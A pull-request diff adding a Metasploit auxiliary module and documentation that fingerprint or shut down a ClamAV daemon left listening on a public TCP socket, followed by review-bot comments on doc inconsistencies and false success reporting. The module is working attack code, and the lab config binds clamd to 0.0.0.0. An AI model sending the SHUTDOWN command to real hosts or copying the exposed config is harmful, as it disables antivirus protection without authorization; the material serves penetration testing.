Land #6980, Add ClamAV Remote Command Transmitter
Showing 2 changed files with 148 additions and 0 deletions.
documentation/modules/auxiliary/scanner/misc/clamav_control.md
91 changes: 91 additions & 0 deletions
@@ -0,0 +1,91 @@ | ||
ClamAV is an open source antivirus engine for detecting trojans, viruses, malare, and other | ||
malicious threats. | ||
|
||
clamav_control takes advantage of a possible misconfiguration in the ClamAV service on release | ||
0.99.2 if the service is tied to a socket, and allows you fingerprint the version, and being | ||
able to shut down the service. | ||
|
||
## Vulnerable Application | ||
|
||
To install ClamAV from Ubuntu: | ||
|
||
``` | ||
$ sudo apt-get install clamav clamav-daemon | ||
$ sudo freshclam | ||
``` | ||
|
||
You might also need to add the following to /etc/clamav/clamd.conf: | ||
|
||
``` | ||
# TCP port address. | ||
# Default: no | ||
TCPSocket 3310 | ||
# TCP address. | ||
# By default we bind to INADDR_ANY, probably not wise. | ||
# Enable the following to provide some degree of protection | ||
# from the outside world. | ||
# Default: no | ||
TCPAddr 0.0.0.0 | ||
# Maximum length the queue of pending connections may grow to. | ||
# Default: 15 | ||
MaxConnectionQueueLength 30 | ||
# Clamd uses FTP-like protocol to receive data from remote clients. | ||
# If you are using clamav-milter to balance load between remote clamd daemons | ||
# on firewall servers you may need to tune the options below. | ||
# Close the connection when the data size limit is exceeded. | ||
# The value should match your MTA's limit for a maximum attachment size. | ||
# Default: 10M | ||
StreamMaxLength 55M | ||
# Limit port range. | ||
# Default: 1024 | ||
#StreamMinPort 30000 | ||
# Default: 2048 | ||
#StreamMaxPort 32000 | ||
# Maximum number of threads running at the same time. | ||
# Default: 10 | ||
MaxThreads 50 | ||
# Waiting for data from a client socket will timeout after this time (seconds). | ||
# Value of 0 disables the timeout. | ||
# Default: 120 | ||
ReadTimeout 300 | ||
# Waiting for a new job will timeout after this time (seconds). | ||
# Default: 30 | ||
#IdleTimeout 60 | ||
# Maximum depth directories are scanned at. | ||
# Default: 15 | ||
#MaxDirectoryRecursion 20 | ||
``` | ||
|
||
And finally, start the service: | ||
|
||
``` | ||
$ sudo /etc/init.d/clamav-daemon start | ||
``` | ||
|
||
## Options | ||
|
||
clamav_control comes with two actions: | ||
|
||
**VERSION** | ||
|
||
This is the default action, and shows you the ClamAV version. Output example: | ||
|
||
``` | ||
msf auxiliary(clamav_control) > run | ||
[+] 192.168.1.203:3310 - ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016 | ||
``` | ||
|
||
**SHUTDOWN** | ||
|
||
This action allows you to shutdown ClamAV. You can also use the VERSION action again to verify | ||
whether is service is down or not. |
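Review bot: the version statement in the intro does not match the rest of the file. The text says the misconfiguration is "on release 0.99.2", but the VERSION sample output prints "ClamAV 0.98.7/21772/...", and the module sends the same command regardless of version. Suggest dropping the release number and describing the condition as what the config block actually sets up: clamd listening on a TCP socket (TCPSocket) bound to a non-loopback address (TCPAddr) that the scanner can reach. In the clamd.conf block, the comment above "TCPAddr 0.0.0.0" still says the setting provides "some degree of protection from the outside world", while 0.0.0.0 binds every interface and is exactly the exposure being demonstrated; a sentence saying this is deliberate for the lab, and that 127.0.0.1 is the safe value, would avoid a reader copying it as hardening advice. Wording fixes: "malare" -> "malware", "allows you fingerprint the version, and being able to shut down the service" -> "allows you to fingerprint the version and shut down the service", "To install ClamAV from Ubuntu" -> "To install ClamAV on Ubuntu", "whether is service is down or not" -> "whether the service is down", and the "## Options" heading introduces the module's actions rather than its options, so "## Actions" would be more accurate.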
@@ -0,0 +1,57 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::Tcp | ||
include Msf::Auxiliary::Scanner | ||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'ClamAV Remote Command Transmitter', | ||
'Description' => %q( | ||
In certain configurations, ClamAV will bind to all addresses and listen for commands. | ||
This module sends properly-formatted commands to the ClamAV daemon if it is in such a | ||
configuration. | ||
), | ||
'Author' => [ | ||
'Alejandro Hdeza', # DISCOVER | ||
'bwatters-r7', # MODULE | ||
'wvu' # GUIDANCE | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
[ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ], | ||
[ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ] | ||
], | ||
'DisclosureDate' => 'Jun 8 2016', | ||
'Actions' => [ | ||
[ 'VERSION', 'Description' => 'Get Version Information' ], | ||
[ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ] | ||
], | ||
'DefaultAction' => 'VERSION' | ||
) | ||
) | ||
register_options( | ||
[ | ||
Opt::RPORT(3310) | ||
], self.class | ||
) | ||
end | ||
|
||
def run_host(_ip) | ||
begin | ||
connect | ||
sock.put(action.name + "\n") | ||
print_good(sock.get_once) | ||
rescue EOFError | ||
print_good('Successfully shut down ClamAV Service') | ||
ensure | ||
disconnect | ||
end | ||
end | ||
end |
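Review bot: run_host reports success on any reply and on any EOF, so a non-ClamAV listener on port 3310 that answers with anything (or simply closes the connection) is printed with print_good, and for the VERSION action an EOF is reported as "Successfully shut down ClamAV Service" even though nothing was shut down. Suggest checking the reply before reporting, e.g. `res = sock.get_once` followed by `if res && res.start_with?('ClamAV ')` for print_good and print_error otherwise, and only taking the EOFError branch as success when `action.name == 'SHUTDOWN'`. sock.get_once also returns nil when no data arrives within the read timeout, which the current code passes straight to print_good and prints as an empty result. The documentation sample shows output prefixed with "192.168.1.203:3310 - ", but nothing in run_host builds that prefix; `"#{rhost}:#{rport} - #{res.strip}"` would match the docs and drop the trailing newline clamd returns. Minor: the begin/rescue/ensure wrapper can be the method's own rescue/ensure clauses (Style/RedundantBegin), and a short comment that clamd commands are sent as the bare command name followed by a newline would document the `action.name + "\n"` line.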